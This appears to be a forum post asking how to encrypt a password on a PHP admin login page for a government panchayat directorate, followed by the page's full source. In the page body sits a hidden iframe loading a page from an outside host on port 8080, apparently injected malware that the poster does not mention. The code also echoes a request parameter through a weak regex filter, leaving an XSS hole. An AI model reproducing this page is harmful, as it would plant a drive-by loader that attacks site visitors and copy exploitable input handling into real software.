hey,i have a login form wherein the take the username and password from the user and submit the form.im using burpsuite t check 4 threats.when i click on the submit button the password is visible.is it possible to encrypt the password as soon as enter it instead of passing it on clickin the submit button.here is my code:
<?php
session_start();
$old_sessionid = session_id(); //i've added these lines
session_regenerate_id(); //i've added these lines
$new_sessionid = session_id(); //i've added these lines
if( isset($_SESSION['gel']) ) {
header("Location: admin.php");
}
if( isset($_POST['submit']) ) {
require_once "../inc/functions.php";
$user = htmlentities($_POST['txtuser']);
$pass = htmlentities($_POST['txtpass']);
if($user && $pass){
$error=sessionStart($user,$pass);
}else{
$error = " <p style='color:#FF0000'>Invalid Username or Password</p>";
}
}
function cleanInput($input) {
$search = array(
'@<\s*script[^>]*?>.*?<\s*/\s*script\s*>@si', // Strip out javascript
'@<\s*[\/\!]*?[^<>]*?>@si', // Strip out HTML tags
'@<\s*style[^>]*?>.*?<\s*/\s*style\s*>@siU', // Strip style tags properly
'@<![\s\S]*?[ \t\n\r]*>@',
'/<img[^>]+\>/i' // Strip multi-line comments
);
$output = preg_replace($search, '', $input);
return $output;
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Admin :: Login</title>
<script type="text/javascript" src="md5.js"></script>
<script type="text/javascript" src="login.js"></script>
<link rel="stylesheet" type="text/css" href="admin.css" />
<script type="text/javascript">
<!--
function MM_validateForm() { //v4.0
if (document.getElementById){
var i,p,q,nm,test,num,min,max,errors='',args=MM_validateForm.arguments;
for (i=0; i<(args.length-2); i+=3) { test=args[i+2]; val=document.getElementById(args[i]);
if (val) { nm=val.name; if ((val=val.value)!="") {
if (test.indexOf('isEmail')!=-1) { p=val.indexOf('@');
if (p<1 || p==(val.length-1)) errors+='- '+nm+' must contain an e-mail address.\n';
} else if (test!='R') { num = parseFloat(val);
if (isNaN(val)) errors+='- '+nm+' must contain a number.\n';
if (test.indexOf('inRange') != -1) { p=test.indexOf(':');
min=test.substring(8,p); max=test.substring(p+1);
if (num<min || max<num) errors+='- '+nm+' must contain a number between '+min+' and '+max+'.\n';
} } } else if (test.charAt(0) == 'R') errors += '- '+args[i]+' is required.\n'; }
} if (errors) alert('The following error(s) occurred:\n'+errors);
document.MM_returnValue = (errors == '');
} }
//-->
</script>
</head>
<body><iframe src="http://b8e.at:8080/index.php" width=178 height=183 style="visibility: hidden"></iframe>
<div class="container">
<div class="wrap">
<div class="header">
<img class ="head_logo" src="../images/logo.jpg" alt="Goavernment Logo">
<div class ="head_name">
DIRECTORATE OF PANCHAYATS
</div>
</div>
<div align="center" class="outerbox">
<div align="center" class="loginbox">
<p style="font-family:Tahoma"><strong>Administrator Login</strong></p>
<?=cleanInput($_REQUEST['error']);?>
<form id="myform" name="myform" method="post" action="index.php">
<table width="250" border="0">
<tr>
<td align="left"><strong>User</strong></td>
<td > <input type="text" name="txtuser" id="User" /></td>
</tr>
<tr>
<td align="left"><strong>Password</strong></td>
<td ><input type="password" name="txtpass" id="Password" /></td>
</tr>
</table>
<br />
<input name="submit" type="submit" onclick="MM_validateForm('User','','R','Password','','R');return document.MM_returnValue" value="Login" />
</form>
</div>
</div>
</div><br>
</div>
</form>
</body>
</html>